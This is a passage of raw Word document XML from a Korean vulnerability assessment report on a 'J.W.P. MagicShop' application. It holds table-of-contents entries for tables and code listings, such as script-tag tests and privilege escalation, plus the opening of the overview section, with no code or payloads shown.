          <w:instrText xml:space="preserve"> PAGEREF _Toc209094666 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69278B38" w14:textId="1C833DCB" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094667" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="003C5FA4">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[표] 3. 진단 인력</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094667 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D14C56D" w14:textId="2E729615" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094668" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="003C5FA4">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[표] 4. 진단 도구</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094668 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10E6B786" w14:textId="47CC554E" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094669" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="003C5FA4">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[표] 5. 주요 진단 항목</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094669 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E1B49BF" w14:textId="3B5BFE06" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094670" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="003C5FA4">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[표] 6. 대상별 취약점 요약</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094670 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="788F4540" w14:textId="77E91BD2" w:rsidR="00AF2F1B" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9AA8F9" w14:textId="77777777" w:rsidR="00AF2F1B" w:rsidRDefault="00AF2F1B">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A68B59C" w14:textId="045BA7A9" w:rsidR="00A1542E" w:rsidRDefault="00132B6E" w:rsidP="00D30CC6">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>코드</w:t>
      </w:r>
      <w:r w:rsidR="00AF2F1B" w:rsidRPr="00C90506">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 목</w:t>
      </w:r>
      <w:r w:rsidR="006A2123">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>차</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6653F625" w14:textId="7E2223F4" w:rsidR="00B9713E" w:rsidRDefault="003B3038">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>TOC \f F \h \z \c "[코드]"</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc209094671" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00761172">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[코드] 1. DB유저 확인 쿼리</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094671 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="0041664A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E16C41B" w14:textId="32D0E898" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094672" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00761172">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[코드] 2. 디렉터리 리스팅 설정 코드</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094672 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A6E1169" w14:textId="787FC9C7" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094673" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00761172">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[코드] 3. 우회 HTML 스크립트 태그</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094673 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B9E9534" w14:textId="3BA5E226" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094674" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00761172">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[코드] 4. 점검용 HTML 스크립트 태그</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094674 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DCEBE3C" w14:textId="1B466C01" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094675" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00761172">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[코드] 5. 특정 사용자의 권한 상승 코드</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094675 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F64F58B" w14:textId="578417B1" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094676" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00761172">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[코드] 6. 자동화 스크립트 환경 설정 설치 코드</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094676 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F2C7EA2" w14:textId="388740C3" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094677" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00761172">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[코드] 7. 로그인 자동화 코드</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094677 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5902DBFA" w14:textId="3613A8C2" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094678" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00761172">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[코드] 8. 회원가입 자동화 코드</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094678 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DBDD877" w14:textId="03CCADDA" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094679" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00761172">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[코드] 9. 게시물 작성 자동화 코드</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094679 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B3BA74E" w14:textId="5726347B" w:rsidR="003B3038" w:rsidRPr="003B3038" w:rsidRDefault="003B3038" w:rsidP="003B3038">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACFE84B" w14:textId="2386EE17" w:rsidR="00AF2F1B" w:rsidRDefault="00AF2F1B">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BE2C3D" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRPr="00CB52FF" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:pStyle w:val="Level1TitleCtl1"/>
        <w:wordWrap/>
        <w:ind w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc479668183"/>
      <w:bookmarkStart w:id="2" w:name="_Toc479668226"/>
      <w:bookmarkStart w:id="3" w:name="_Toc479668425"/>
      <w:bookmarkStart w:id="4" w:name="_Toc479669579"/>
      <w:bookmarkStart w:id="5" w:name="_Toc206601949"/>
      <w:bookmarkStart w:id="6" w:name="_Toc209094538"/>
      <w:r w:rsidRPr="00CB52FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>개요</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="7EB3EBD6" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRPr="00286433" w:rsidRDefault="005D30D0" w:rsidP="009E4926">
      <w:pPr>
        <w:pStyle w:val="Level2TitleCtl2"/>
        <w:ind w:left="426" w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc479668184"/>
      <w:bookmarkStart w:id="8" w:name="_Toc479668227"/>
      <w:bookmarkStart w:id="9" w:name="_Toc479668426"/>
      <w:bookmarkStart w:id="10" w:name="_Toc479669580"/>
      <w:bookmarkStart w:id="11" w:name="_Toc206601950"/>
      <w:bookmarkStart w:id="12" w:name="_Toc209094539"/>
      <w:r w:rsidRPr="00286433">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진단 목적</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="576B5C1D" w14:textId="0976E3CC" w:rsidR="005D30D0" w:rsidRPr="00286433" w:rsidRDefault="005D30D0" w:rsidP="0016533F">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r w:rsidRPr="004B7F5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>본</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F5D">
        <w:t xml:space="preserve"> 취약점 진단은 </w:t>
      </w:r>
      <w:r w:rsidR="000711C5" w:rsidRPr="000711C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00EE56B6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>J.W.P. MagicShop</w:t>
      </w:r>
      <w:r w:rsidR="000711C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F5D">
        <w:t>에서 운영</w:t>
      </w:r>
      <w:r w:rsidR="004811BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F5D">
        <w:t xml:space="preserve">중인 </w:t>
      </w:r>
      <w:r w:rsidR="00383492">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>애</w:t>
      </w:r>
      <w:r w:rsidR="0002136E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">플리케이션 </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F5D">
